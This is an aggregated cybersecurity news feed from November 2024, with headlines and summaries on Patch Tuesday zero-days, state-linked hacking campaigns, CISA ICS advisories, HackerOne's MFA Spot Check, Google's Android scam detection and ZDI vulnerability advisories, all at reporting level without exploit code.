Treat your cloud infrastructure security as a whole. Attackers have figured out that multi-cloud integrations offer fertile ground. Put your multiple cloud environments under one security roof, unifying workload monitoring, entitlements management and security posture, for comprehensive visibility. Include contextual analysis to reveal which cloud assets hold sensitive data and who can access them.
Don’t wait, remediate CVEs. Make it your organization’s security culture to quickly address severe vulnerabilities. Context matters when prioritizing vulnerabilities for remediation. The ability to quickly analyze which systems contain a vulnerability, which users interact with that system, what data is stored there and whether or not it’s publicly accessible will enable you to prioritize those vulnerabilities which represent the greatest risk to your organization. You’ll be able to give prescriptive guidance to the other teams involved in your vulnerability remediation process.
Don’t underestimate permissions risk. Analyze all identities dynamically, enabling teams to identify access risk and confidently resolve the excessive permissions that lead to toxic cloud trilogies. Apply least privilege principles, including through time-saving just-in-time access controls that make developers willing security partners.
Be aware of public-facing assets and configurations. External exposure is a double-edged sword — necessary for doing business and a potential source of exposure. Rein in and monitor assets configured as public.
Summary
Our research showed that, unwittingly or not, many organizations have unnecessary exposures in their cloud environments. Since we can’t know what a malicious actor will do next, control what you can. Add context to unmask and prioritize security gaps like the toxic cloud trilogy, and close such exposures swiftly.
Learn more
Read the Tenable Cloud Risk Report 2024
View the on-demand webinar Empower Your 2025 Cloud Security Planning with Tenable's Data Insights
Read the Tenable Cloud Risk Report Sounds the Alarm on Toxic Cloud Exposures Threatening Global Organizations
by Tenable
2024-11-14 11:13:00
Russian Hackers Exploit New NTLM Flaw to Deploy RAT Malware via Phishing EmailsA newly patched security flaw impacting Windows NT LAN Manager (NTLM) was exploited as a zero-day by a suspected Russia-linked actor as part of cyber attacks targeting Ukraine. The vulnerability in question, CVE-2024-43451 (CVSS score: 6.5), refers to an NTLM hash disclosure spoofing vulnerability that could be exploited to steal a user's NTLMv2 hash. It was patched by Microsoft earlier this
by The Hacker News
2024-11-14 11:00:26
More From Our Main Blog: The State of Cloud Ransomware in 2024In this new report, learn how threat actors are leveraging cloud services to target web services with ransomware.
by SentinelOne
2024-11-14 11:00:02
New PXA Stealer targets government and education sectors for sensitive informationCisco Talos discovered a new information stealing campaign operated by a Vietnamese-speaking threat actor targeting government and education entities in Europe and Asia.
by Cisco Talos Blog
2024-11-14 10:51:21
Update now! November Patch Tuesday tackles 4 zero-days, two actively exploitedMicrosoft’s November Patch Tuesday includes fixes for 89 vulnerabilities in total.
by ThreatDown
2024-11-14 10:33:44
Navigating the Convergence of Edge Computing, IoT, and OT With AIOpsBy providing contextualization within the larger IT estate, AIOps ensures seamless performance, enhanced security, and operational efficiency.
by ITPro Today
2024-11-14 10:32:41
Key Industrial Control System Vulnerabilities Identified in Recent CISA Advisories
Overview
Cyble Research & Intelligence Labs' (CRIL) Weekly Industrial Control System (ICS) Vulnerability Intelligence Report has highlighted multiple security vulnerabilities disclosed by the Cybersecurity and Infrastructure Security Agency (CISA). These ICS vulnerabilities affect critical Industrial Control System components from Bosch Rexroth, Delta Electronics, and Beckhoff Automation, putting unsuspecting users at risk. With multiple vulnerabilities posing substantial risks to operational continuity, prompt patching and mitigation efforts are critical.
CISA issued three security advisories this week, each addressing several Industrial Control System vulnerabilities of varying severity. The vulnerabilities affect products integral to manufacturing, energy, and utilities. Cyble Research & Intelligence Labs has emphasized the need to prioritize patching certain vulnerabilities due to their potential impact on operational systems and the risk of exploitation by cyber adversaries.
The most concerning vulnerabilities include stack-based buffer overflow issues in Delta Electronics' DIAScreen and a command injection vulnerability in Beckhoff Automation's TwinCAT Control Package. If exploited, these vulnerabilities could lead to severe disruptions, including device crashes, remote code execution, and unauthorized command execution.
Detailed Vulnerability Analysis
The vulnerabilities identified this week affect multiple products and vendors within the ICS environment.
Bosch Rexroth – Uncontrolled Resource Consumption in IndraDrive Controllers
CVE-2024-48989 is a high-severity vulnerability affecting Bosch Rexroth AG's IndraDrive FWA-INDRV*-MP* and IndraDrive Controllers. The vulnerability arises from uncontrolled resource consumption within the affected devices, which, if exploited, could lead to system instability or a denial of service (DoS) attack.
To mitigate this vulnerability, it is strongly recommended that organizations immediately apply the vendor's patch. This will minimize the risk of exploitation and ensure the continued reliability and security of the affected devices.
Delta Electronics – Multiple Stack-Based Buffer Overflow Vulnerabilities in DIAScreen
The vulnerabilities identified as CVE-2024-47131, CVE-2024-39605, and CVE-2024-39354 are high-severity issues affecting Delta Electronics' DIAScreen versions prior to v1.5.0. These vulnerabilities stem from stack-based buffer overflows within the software, which could cause the device to crash when exploited. If successfully attacked, remote adversaries could execute arbitrary code on the compromised device, potentially leading to a complete device compromise and significant operational downtime.
To mitigate the risks associated with these vulnerabilities, Delta Electronics has released patches that address the issue. Organizations using affected versions are strongly advised to upgrade to the latest software versions to protect their systems. Additionally, implementing network segmentation can help minimize the exposure of critical assets, further reducing the likelihood of successful exploitation.
Beckhoff Automation – Command Injection in TwinCAT Control Package
CVE-2024-8934 is a medium-severity vulnerability affecting the TwinCAT Control Package for versions prior to 1.0.603.0. This vulnerability arises from a command injection flaw, which could allow attackers to execute arbitrary commands within the system. If successfully exploited, this could compromise the underlying infrastructure, potentially impacting the security and stability of the affected systems.
To address this issue, organizations should upgrade to the latest version of the TwinCAT Control Package. This will effectively mitigate the vulnerability. Additionally, to further protect against exploitation, restricting access to the affected systems through network-level controls is advisable.
The vulnerabilities disclosed in this report demonstrate a concerning trend in the ICS vulnerability environment. The data from CISA reveals that a large proportion of the vulnerabilities affecting Industrial Control Systems (ICS) fall under critical or high-severity categories. Specifically, 50% of the identified vulnerabilities are classified as critical, while 30% are categorized as high severity. In contrast, medium-severity vulnerabilities account for 15% of the total, while low-severity vulnerabilities make up just 5%. This distribution underscores the increasing risks posed by ICS vulnerabilities, highlighting the critical importance of implementing robust vulnerability management strategies to address and mitigate potential threats.
Recommendations for Mitigating ICS Vulnerabilities
To effectively manage and mitigate the risks associated with these vulnerabilities, the following steps are recommended:
Organizations should follow the guidance provided by CISA and apply patches as soon as they become available. Staying up to date with vendor updates and security advisories is critical to ensuring that vulnerabilities are addressed promptly.
Segregating ICS networks from other parts of the IT infrastructure can help prevent lateral movement in case of a breach. Implementing a Zero-Trust Architecture is also advisable to limit the potential for exploitation.
Regular cybersecurity training for all personnel, particularly those with access to Operational Technology (OT) systems, can help prevent human error and reduce the risk of social engineering attacks.
Ongoing vulnerability scanning and penetration testing can help identify and address weaknesses before attackers exploit them.
Engaging threat intelligence services and staying updated with CISA’s vulnerability intelligence reports is essential for proactive defense.
Developing a robust incident response plan and conducting regular security drills ensures that organizations are prepared for a quick and coordinated response to any security incidents that may arise.
Conclusion
The ICS vulnerabilities highlighted by CISA demonstrate the rise of new risks targeting the industrial sector. By implementing comprehensive patch management strategies, enhancing network security, and staying informed about CISA’s vulnerability alerts, organizations can reduce their exposure to these risks and better protect their critical assets from potential exploitation. Proactive measures such as regular security audits, network segmentation, and continuous monitoring will be essential for ensuring the ongoing safety and security of Industrial Control Systems and their associated networks.
by CYBLE
2024-11-14 10:30:00
More Spyware, Fewer Rules: What Trump’s Return Means for US CybersecurityExperts expect Donald Trump’s next administration to relax cybersecurity rules on businesses, abandon concerns around human rights, and take an aggressive stance against the cyber armies of US adversaries.
by WIRED Security News
2024-11-14 10:00:00
SolarWinds Report Reveals Surprising Trends in ITSM EfficiencySolarWinds challenges traditional IT service management assumptions in its new report.
by ITPro Today
2024-11-14 09:55:30
FBI confirms China-backed hackers breached US telecom giants to steal wiretap dataThe FBI and CISA say they have uncovered a "broad and significant" China-linked cyber espionage campaign © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-11-14 09:54:27
Effectively Integrating AI with IGA: The Great Identity Bake-OffAs excitement builds around large language models, AI integrations in Identity Governance and Administration promise to enhance efficiency and decision-making — but only with careful planning.
by ITPro Today
2024-11-14 09:07:00
National cyber director calls for streamlined security regulationsHarry Coker Jr. assured critical infrastructure and private sector stakeholders that while standards are necessary, there is a need to harmonize burdensome compliance demands.
by Cybersecurity Dive
2024-11-14 09:04:12
CVE-2024-43451 allows stealing NTLMv2 hash | Kaspersky official blogPatch Tuesday, November 2024: CVE-2024-43451, used in real attacks, permits stealing an NTLMv2 hash with minimal interaction from the victim.
by Kaspersky
2024-11-14 09:00:26
Crimeware and financial cyberthreats in 2025Kaspersky's GReAT looks back on the 2024 predictions about financial and crimeware threats, and explores potential cybercrime trends for 2025.
by Securelist
2024-11-14 08:57:00
Feds find ‘broad and significant’ China espionage campaign in US telecom networksThe FBI and CISA warned the nation-state affiliated malicious activities are extensive and include the theft of sensitive call records and court-ordered information.
by Cybersecurity Dive
2024-11-14 07:42:00
5th Circuit dismisses Cargill employee’s Kronos hack, discrimination claimsThe decision is also a victory for UKG, whom the employee sued separately for privacy violation allegations stemming from a 2021 ransomware attack.
by Cybersecurity Dive
2024-11-14 07:00:00
Hamas Hackers Spy on Mideast Gov'ts, Disrupt IsraelAPT Wirte is doing double duty, adding all manner of supplemental malware to gain access, eavesdrop, and wipe data, depending on the target.
by Dark Reading
2024-11-14 05:47:49
Rethinking Crown Jewels Analysis: Mitigating Cybersecurity BiasUncover the risks of bias in Crown Jewels Analysis (CJA) and learn strategies to protect your organization's most valuable assets with a comprehensive approach.
by Mitiga
2024-11-14 05:47:49
Microsoft Breach by Midnight Blizzard (APT29): What Happened?Understand the Midnight Blizzard Microsoft breach by APT29, what happened, and key steps organizations should take to strengthen their defenses.
by Mitiga
2024-11-14 05:47:49
Unlocking Cloud Security with Managed Detection and ResponseSee how Mitiga’s Cloud Managed Detection and Response tackles complex cyber threats with proactive threat management and advanced automation at scale.
by Mitiga
2024-11-14 03:51:00
Interested in ICS pentesting? Here's how to get startedDemand for ICS pentesting and OT security is on the rise. We break down the specialist skillsets needed to keep our world running smoothly.
by Hack The Box Blog
2024-11-14 01:37:28
Teen Behind Hundreds of Swatting Attacks Pleads Guilty to Federal ChargesAlan Filion, believed to have operated under the handle “Torswats,” admitted to making more than 375 fake threats against schools, places of worship, and government buildings around the United States.
by WIRED Security News
2024-11-14 00:00:00
Streamlining Security: Integrating Amazon Bedrock with ElasticThis article will guide you through the process of setting up the Amazon Bedrock integration and enabling Elastic's prebuilt detection rules to streamline your security operations.
by Elastic Security Lab
2024-11-14 00:00:00
Russian Sabotage Activities Escalate Amid Fraught TensionsRussia’s sabotage in Europe threatens NATO allies, targeting infrastructure to weaken Ukraine support. Explore tactics, goals, and risks.
by Recorded Future
2024-11-14 00:00:00
Attacking JWT with Self-Signed ClaimsJSON Web Tokens (JWTs) are a widely used format for applications and APIs to pass authorization information. These tokens often use a JSON Web Signature (JWS) to verify that the data within the payload has not been…
by TrustedSec
2024-11-14 00:00:00
ZDI-24-1511: Microsoft Office PowerPoint PPTX File Parsing Use-After-Free Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Office PowerPoint. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-49032.
by Zero Day Initiative Advisories
2024-11-13 23:17:06
Iranian TA455 Initiates Dream Job Campaign to Target Aviation and Other Critical Industries with MalwareExecutive Summary Researchers from ClearSky Cyber Security have uncovered a new cyber espionage campaign attributed to TA455, a subgroup of the Iranian cyber threat actor known as Charming Kitten (also known as APT35). The cyber espionage campaign, which has been active since at least September 2023, has targeted critical industry sector entities in the aerospace, aviation, and...
by RH-ISAC
2024-11-13 22:39:34
Toolkit Vastly Expands APT41's Surveillance PowersThe China-affiliated group is using the highly modular DeepData framework to target organizations in South Asia.
by Dark Reading
2024-11-13 22:34:56
Zero-Days Win the Prize for Most Exploited VulnsAmong the top exploited zero-day vulnerabilities were bugs found in systems from Citrix and Cisco.
by Dark Reading
2024-11-13 22:23:33
Trustwave-Cybereason Merger Boosts MDR PortfolioThe consolidation folds Cybereason's endpoint detection and response (EDR) platform into Trustwave's managed security services offerings, such as managed detection and response (MDR).
by Dark Reading
2024-11-13 22:12:11
20% of Industrial Manufacturers Are Using Network Security as a First Line of Defense
by Dark Reading
2024-11-13 22:10:11
Temu must respect consumer protection laws, says EUTemu is under investigation for a variety of misleading practices.
by Malwarebytes Labs
2024-11-13 21:39:00
Hamas-Affiliated WIRTE Employs SameCoin Wiper in Disruptive Attacks Against IsraelA threat actor affiliated with Hamas has expanded its malicious cyber operations beyond espionage to carry out disruptive attacks that exclusively target Israeli entities. The activity, linked to a group called WIRTE, has also targeted the Palestinian Authority, Jordan, Iraq, Saudi Arabia, and Egypt, Check Point said in an analysis. "The [Israel-Hamas] conflict has not disrupted the WIRTE's
by The Hacker News
2024-11-13 21:01:05
Devices, computing, security. It’s all about the edge.Barracuda was just recognized in the CRN Edge Computing 100 as one of the 25 Hottest Edge Security Companies of 2024. Here's what that means and how we can help you.
by Barracuda
2024-11-13 21:00:18
Why Overlooking Identity in Disaster Recovery Is Putting Businesses at RiskTo protect critical operations, organizations should embed identity continuity into disaster recovery plans, using failover, DR-specific policies, and identity orchestration for resilience and uninterrupted access during crises.
by ITPro Today
2024-11-13 20:58:08
How HackerOne Disproved an MFA Bypass With a Spot Check
Ian Melven, Wed, 11/13/2024 - 12:58
What Is a Spot Check?
A Spot Check is a powerful tool for security teams to do a tightly focused and scoped human-powered assessment with security researchers. Available as part of HackerOne Bounty and Challenge programs, Spot Checks are ideal for testing new features, critical features such as authentication and authorization, or older legacy apps and code.
Why Did HackerOne Conduct a Spot Check?
A threat actor posted on X indicating that they were offering to sell the details of an MFA bypass in the HackerOne platform. No additional evidence was provided. This information was picked up by an X account that publishes news in the Infosec space. While the bypass seemed unlikely, we wanted to verify the security of our MFA implementation and gain confidence via focused testing to be sure.
In addition, we’re invested in using and testing our own features, including Spot Checks. HackerOne uses its own Platform to run its bug bounty program and to perform both penetration tests and phishing assessments, and Spot Checks should be no different. The HackerOne Security team is its own internal customer.
Spot Check Timeline
July 4, 2024
The first report of allegations of the MFA bypass was received.
Steps:
Review reports: We reviewed all open and closed reports to our program involving MFA to see if the issue might have already been reported and then re-evaluated the reports for risk. Nothing was identified as a potential MFA bypass.
Examine authentication logs: We examined our authentication logs for evidence of any MFA bypass.
July 9, 2024
The report was picked up by the media. We received some customer inquiries, which we addressed through the following response:
"We're aware of the claims of an MFA bypass in the HackerOne platform and are investigating. However, these claims remain unsubstantiated and no technical detail has been provided to HackerOne. Reports of any valid security issue in the HackerOne platform are welcome via our world-class bug bounty program. As always, we monitor for suspicious login activity and are ready to take action if it were necessary. In addition, we will be launching a HackerOne Spot Check to further fortify our MFA posture."
July 11, 2024
Spot Check launched.
Conducting the Spot Check
Initial Request
Our internal security team worked with the bug bounty program manager and our internal customer success manager to craft the scope and focus of the Spot Check. The initial request looked like this:
"We would like the MFA authentication mechanism of the HackerOne platform deeply and thoroughly tested for any bypasses or other security issues. Security researchers can test this functionality by creating accounts on the HackerOne platform and enabling MFA on their accounts. Target: https://x.com/MonThreat/status/1808854873510662370 We are looking for any bypass of MFA where a username and password is enough to log in to an account with MFA enabled, i.e. MFA is not required. This includes the ability to determine a user's TOTP seed or predict the required MFA code based on other available information. Please review these previous reports of issues in MFA and their evaluation and resolution to avoid reporting duplicates: (the list of previous reports was included here)."
It was important to provide the existing MFA reports to the security researchers executing the Spot Check so they would know what issues had been found and how they had been triaged and resolved previously. This helped guide the researchers as to what issues were valuable to us and also helped them avoid reporting duplicate issues.
Test Specs
Medium Spot Check at $1,000 each, with five security researchers, for a total cost of $5,000
Selected a group of top researchers experienced with finding MFA bypasses quickly
Received submitted writeups from four researchers, each of whom spent 10-40 hours testing
Results
The Spot Check was a success and the security team is very pleased with the outcome. The detailed writeups provided confidence in the thoroughness and depth of testing of authentication and, specifically, of our implementation of multifactor authentication.
As a result of the Spot Check, we were also very grateful to have discovered one medium-severity issue: a race condition vulnerability in our 2FA reset process. The bug was resolved and disclosed in the HackerOne Platform.
The Value of Focused Testing Through Spot Checks
If you’re looking for highly focused testing with flexible direction and specific, test-based researcher selections, yet faster and cheaper than a full-scale pentest—Spot Checks are the answer. At HackerOne, we love utilizing Spot Checks for our internal security needs, and our team is happy to discuss the best ways to implement Spot Checks for your organization. Contact our team today, or HackerOne customers can get started with a Spot Check now.
Read how HackerOne's internal security team disproved an alleged MFA bypass with a targeted Spot Check.
by HackerOne
2024-11-13 20:36:30
How IoT Is Shaping Resilience and Innovation in a Changing WorldAccording to Eseye's 2024 report, IoT adoption is expected to grow significantly across sectors, with a focus on sustainability, security, and new standards like SGP.32.
by ITPro Today
2024-11-13 20:31:41
5 Ways to Save Your Organization From Cloud Security ThreatsThe shift to cloud means securing your organization's digital assets requires a proactive, multilayered approach.
by Dark Reading
2024-11-13 20:29:55
LastPass adds passkey support for free and premium users - but there's a catchLastPass users can take another step toward a password-less world. Here's how to activate the beta feature now.
by ZDNET Security
2024-11-13 20:21:21
Iranian Cybercriminals Target Aerospace Workers via LinkedInThe group seeks out aerospace professionals by impersonating job recruiters — a demographic it has targeted in the past as well — then deploys the SlugResin backdoor malware.
by Dark Reading
2024-11-13 20:08:55
Fortifying Defenses Against AI-Powered OSINT Cyber AttacksIn the ever-evolving landscape of cybersecurity, the convergence of Artificial Intelligence (AI) and Open-Source Intelligence (OSINT) has created new opportunities for risk.
by KnowBe4
2024-11-13 20:08:32
Criminal Threat Actor Uses Stolen Invoices to Distribute MalwareResearchers at IBM X-Force are tracking a phishing campaign by the criminal threat actor “Hive0145” that’s using stolen invoice notifications to trick users into installing malware.
by KnowBe4
2024-11-13 20:04:20
Lawyer allegedly hacked with spyware names NSO founders in lawsuitSpanish lawyer Andreu Van den Eynde is suing NSO Group and its founders Omri Lavie and Shalev Hulio, accusing them of illegal hacking.
by TechCrunch
2024-11-13 19:47:53
Google AI Platform Bugs Leak Proprietary Enterprise LLMsThe tech giant fixed privilege-escalation and model-exfiltration vulnerabilities in Vertex AI that could have allowed attackers to steal or poison custom-built AI models.
by Dark Reading
2024-11-13 19:08:00
Free Decryptor Released for BitLocker-Based ShrinkLocker Ransomware VictimsRomanian cybersecurity company Bitdefender has released a free decryptor to help victims recover data encrypted using the ShrinkLocker ransomware. The decryptor is the result of a comprehensive analysis of ShrinkLocker's inner workings, allowing the researchers to discover a "specific window of opportunity for data recovery immediately after the removal of protectors from BitLocker-encrypted
by The Hacker News
2024-11-13 19:07:15
These Guys Hacked AirPods to Give Their Grandmas Hearing AidsThree technologists in India used a homemade Faraday cage and a microwave oven to get around Apple’s location blocks.
by WIRED Security News
2024-11-13 18:52:41
Response to CISA Advisory (AA24-317A): 2023 Top Routinely Exploited VulnerabilitiesIn response to the recently published CISA Advisory (AA24-317A) that disseminates the top routinely exploited vulnerabilities from 2023, AttackIQ has proposed a multitude of recommendations that customers can take to emulate these prevalent vulnerabilities.
by AttackIQ
2024-11-13 18:10:15
Lessons from a Honeypot with US Citizens’ DataPrior to last week’s US Presidential Election, the Trustwave SpiderLabs team was hard at work investigating potential risks and threats to the election system, from disinformation campaigns to nation-state actors looking to exploit vulnerabilities.
by SpiderLabs Blog
2024-11-13 17:43:25
How to prevent company from getting hacked again | Kaspersky official blogLearning from cyber-incidents and sharing best practices to prevent incident recurrence.
by Kaspersky
2024-11-13 17:39:00
The best travel VPNs of 2024: Expert tested and reviewedWe tested the best VPNs to find the best options for travel. They offer solid and reliable server networks, strong security, and excellent streaming capabilities to preserve your privacy on your next trip away.
by ZDNET Security
2024-11-13 16:32:38
November Patch Tuesday loads up everyone’s plateFourteen product families affected as 2024 passes an unfortunate milestone
by Sophos News
2024-11-13 16:30:00
Comprehensive Guide to Building a Strong Browser Security ProgramThe rise of SaaS and cloud-based work environments has fundamentally altered the cyber risk landscape. With more than 90% of organizational network traffic flowing through browsers and web applications, companies are facing new and serious cybersecurity threats. These include phishing attacks, data leakage, and malicious extensions. As a result, the browser also becomes a vulnerability that
by The Hacker News
2024-11-13 16:27:12
Black Duck Honoured as a Leading Provider in Software Composition Analysis by Top Research FirmBlack Duck® announced today that it has been recognised as a leader in The Forrester Wave™: Software Composition Analysis, Q4 2024. This comprehensive report highlights the 10 most significant vendors in the Software Composition Analysis (SCA) market, assessing them on 25 criteria within two main categories: current offerings and strategic direction. Black Duck achieved the […]
by IT Security Guru
2024-11-13 15:57:39
Hot Topic data breach exposed personal data of 57 million customersMillions of customers of Hot Topic have been informed that their personal data was compromised during an October data breach at the American retailer. Have I Been Pwned (HIBP), the breach notification service, said this week that it alerted 57 million Hot Topic customers that their data had been compromised. The stolen data includes email […]
by TechCrunch
2024-11-13 15:44:55
Skeletons in the Closet: Legacy Software, Novel ExploitsThe Praetorian team recently discovered a new vulnerability in Ivanti Endpoint Manager (EPM) which serves as a reminder to be aware of legacy systems - patch regularly and test often.
by Praetorian
2024-11-13 15:05:00
The Role of Data in Improving Cyber Insurance PricingIn order to improve cybersecurity through cyber insurance, the private sector should aggregate cyber incident data to inform risk models and in turn, more accurately price cyber premiums.
by DFRLab
2024-11-13 15:00:00
How CISOs Can Lead the Responsible AI ChargeCISOs understand the risk scenarios that can help create safeguards so everyone can use AI safely and focus on the technology's promises and opportunities.
by Dark Reading
2024-11-13 15:00:00
Top challenges for implementing multi-domain correlation in the cloudAdversaries often use complex, multi-stage cloud attacks that evade traditional security measures, which struggle to fully visualize, prioritize, and respond...
by Sysdig
2024-11-13 14:58:00
OvrC Platform Vulnerabilities Expose IoT Devices to Remote Attacks and Code ExecutionA security analysis of the OvrC cloud platform has uncovered 10 vulnerabilities that could be chained to allow potential attackers to execute code remotely on connected devices. "Attackers successfully exploiting these vulnerabilities can access, control, and disrupt devices supported by OvrC; some of those include smart electrical power supplies, cameras, routers, home automation systems, and
by The Hacker News
2024-11-13 14:00:00
Adversarial advantage: Using nation-state threat analysis to strengthen U.S. cybersecurityNation-state adversaries are changing their approach, pivoting from data destruction to prioritizing stealth and espionage. According to the Microsoft 2023 Digital Defense Report, “nation-state attackers are increasing their investments and launching more sophisticated cyberattacks to evade detection and achieve strategic priorities.” These actors pose a critical threat to United States infrastructure and protected data, and […]
by Security Intelligence
2024-11-13 13:55:33
Warning: Online shopping threats to avoid this Black Friday and Cyber MondayWhere there’s a gift to be bought, there’s also a scammer out to make money. Here''s how to stay safe this shopping season.
by Malwarebytes Labs
2024-11-13 13:00:47
Amazon Makes It Harder for Disabled Employees to Work From HomeA new "multilevel leader review" can take weeks and has prompted concerns that affected corporate workers will give up and quit.
by ITPro Today
2024-11-13 12:59:00
Safer with Google: New intelligent, real-time protections on Android to keep you safe
Posted by Lyubov Farafonova, Product Manager and Steve Kafka, Group Product Manager, Android
User safety is at the heart of everything we do at Google. Our mission to make technology helpful for everyone means building features that protect you while keeping your privacy top of mind. From Gmail’s defenses that stop more than 99.9% of spam, phishing and malware, to Google Messages’ advanced security that protects users from 2 billion suspicious messages a month and beyond, we're constantly developing and expanding protection features that help keep you safe.
We're introducing two new real-time protection features that enhance your safety, all while safeguarding your privacy: Scam Detection in Phone by Google to protect you from scams and fraud, and Google Play Protect live threat detection with real-time alerts to protect you from malware and dangerous apps. These new security features are available first on Pixel, and are coming soon to more Android devices.
More intelligent AI-powered protection against scams
Scammers steal over $1 trillion dollars a year from people, and phone calls are their favorite way to do it. Even more alarming, scam calls are evolving, becoming increasingly more sophisticated, damaging and harder to identify. That’s why we’re using the best of Google AI to identify and stop scams before they can do harm with Scam Detection.
Real-time protection, built with your privacy in mind.
Real-time defense, right on your device: Scam Detection uses powerful on-device AI to notify you of a potential scam call happening in real-time by detecting conversation patterns commonly associated with scams. For example, if a caller claims to be from your bank and asks you to urgently transfer funds due to an alleged account breach, Scam Detection will process the call to determine whether the call is likely spam and, if so, can provide an audio and haptic alert and visual warning that the call may be a scam.
Private by design, you’re always in control: We’ve built Scam Detection to protect your privacy and ensure you’re always in control of your data. Scam Detection is off by default, and you can decide whether you want to activate it for future calls. At any time, you can turn it off for all calls in the Phone app Settings, or during a particular call. The AI detection model and processing are fully on-device, which means that no conversation audio or transcription is stored on the device, sent to Google servers or anywhere else, or retrievable after the call.
Cutting-edge AI protection, now on more Pixel phones: Gemini Nano, our advanced on-device AI model, powers Scam Detection on Pixel 9 series devices. As part of our commitment to bring powerful AI features to even more devices, this AI-powered protection is available to Pixel 6+ users thanks to other robust Google on-device machine learning models.
We’re now rolling out Scam Detection to English-speaking Phone by Google public beta users in the U.S. with a Pixel 6 or newer device. To provide feedback on your experience, please click on Phone by Google App -> Menu -> Help & Feedback -> Send Feedback. We look forward to learning from this beta and your feedback, and we’ll share more about Scam Detection in the months ahead.
More real-time alerts to protect you from bad apps
Google Play Protect works non-stop to protect you in real-time from malware and unsafe apps. Play Protect analyzes behavioral signals related to the use of sensitive permissions and interactions with other apps and services. With live threat detection, if a harmful app is found, you'll now receive a real-time alert, allowing you to take immediate action to protect your device. By looking at actual activity patterns of apps, live threat detection can now find malicious apps that try extra hard to hide their behavior or lie dormant for a time before engaging in suspicious activity. At launch, live threat detection will focus on stalkerware, code that may collect personal or sensitive data for monitoring purposes without user consent, and we will explore expanding its detection to other types of harmful apps in the future. All of this protection happens on your device in a privacy preserving way through Private Compute Core, which allows us to protect users without collecting data. Live threat detection with real-time alerts in Google Play Protect are now available on Pixel 6+ devices and will be coming to additional phone makers in the coming months.
by Google Security Blog
2024-11-13 12:44:00
Iranian Hackers Use "Dream Job" Lures to Deploy SnailResin Malware in Aerospace Attacks
The Iranian threat actor known as TA455 has been observed taking a leaf out of a North Korean hacking group's playbook to orchestrate its own version of the Dream Job campaign targeting the aerospace industry by offering fake jobs since at least September 2023. "The campaign distributed the SnailResin malware, which activates the SlugResin backdoor," Israeli cybersecurity company ClearSky said
by The Hacker News
2024-11-13 12:44:00
Microsoft Fixes 90 New Flaws, Including Actively Exploited NTLM and Task Scheduler Bugs
Microsoft on Tuesday revealed that two security flaws impacting Windows NT LAN Manager (NTLM) and Task Scheduler have come under active exploitation in the wild. The security vulnerabilities are among the 90 security bugs the tech giant addressed as part of its Patch Tuesday update for November 2024. Of the 90 flaws, four are rated Critical, 85 are rated Important, and one is rated Moderate in
by The Hacker News
2024-11-13 12:13:29
KnowBe4 Releases 2024 Holiday Kit to Boost Cyber Resilience
This week, KnowBe4, the provider of security awareness training and simulated phishing platform, announced the release of its new 2024 Holiday Resource Kit, designed to strengthen users’ cyber defences during the festive season. This year’s kit builds on the success of previous versions, offering a selection of new and improved resources to address the latest […] The post KnowBe4 Releases 2024 Holiday Kit to Boost Cyber Resilience appeared first on IT Security Guru.
by IT Security Guru
2024-11-13 12:00:00
Linux Server Security: Essential Guide for Hardening Servers
With Linux systems increasingly under threat, this guide outlines essential security practices to harden Linux servers.
by ITPro Today
2024-11-13 12:00:00
ICE Started Ramping Up Its Surveillance Arsenal Immediately After Donald Trump Won
US Immigration and Customs Enforcement put out a fresh call for contracts for surveillance technologies before an anticipated surge in the number of people it monitors ahead of deportation hearings.
by WIRED Security News
2024-11-13 12:00:00
Mishing: The Rising Mobile Attack Vector Facing Every Organization
This blog shares the definition of mishing, common tactics used, and the growing threat for organizations. The post Mishing: The Rising Mobile Attack Vector Facing Every Organization appeared first on Zimperium.
by Zimperium
2024-11-13 11:00:36
Global Companies Are Unknowingly Paying North Koreans: Here’s How to Catch Them
We discuss North Korea's use of IT workers to infiltrate companies, detailing detection strategies like IT asset management and IP analysis to counter this. The post Global Companies Are Unknowingly Paying North Koreans: Here’s How to Catch Them appeared first on Unit 42.
by Palo Alto Networks - Unit42
2024-11-13 10:44:32
Citrix Session Recording users warned of CVEs that allow hackers to gain control
Security researchers at watchTowr discovered the flaw and claim attackers can gain access without authentication, a finding which Citrix disputes.
by Cybersecurity Dive
2024-11-13 10:43:35
How to add PGP support on Android for added security and privacy
If you need to add encryption or digital signing to the Thunderbird email app (or other supporting apps) on Android, there's one clear and easy route to success.
by ZDNET Security
2024-11-13 10:00:14
Threats in space (or rather, on Earth): internet-exposed GNSS receivers
Internet-exposed GNSS receivers pose a significant threat to sensitive operations. Kaspersky shares statistics on internet-exposed receivers for July 2024 and advice on how to protect against GNSS attacks.
by Securelist
2024-11-13 10:00:14
Signal offers an encrypted alternative to Zoom - see how it works
The ability to share secure links for video calls is just one of the privacy-focused messaging app's new features.
by ZDNET Security
2024-11-13 09:29:00
European eArchiving project aims at eternal archive with smart metadata
by ComputerWeekly
2024-11-13 08:54:00
Zero-days from top security vendors were most exploited CVEs in 2023
The top five vulnerabilities exploited by attackers last year were found in security gear from Citrix, Cisco and Fortinet, the Five Eyes’ cyber agencies found.
by Cybersecurity Dive
2024-11-13 07:00:00
Middle East Cybersecurity Efforts Catch Up After Late Start
Despite having only a scant focus on cybersecurity regulations a decade ago, countries in the Middle East — led by Saudi Arabia and other Gulf nations — have adopted mature frameworks and regulations amid escalating volumes of attacks.
by Dark Reading
2024-11-13 00:00:00
EKUwu: Not just another AD CS ESC
Update November 12, 2024 - This vulnerability has been patched. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49019 This post was originally published on October 8, 2024. TL;DR - Using built-in default…
by TrustedSec
2024-11-13 00:00:00
ZDI-24-1510: Ivanti Endpoint Manager GetComputerID SQL Injection Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2024-50330.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1509: Ivanti Endpoint Manager vulscan Directory Traversal Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-50329.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
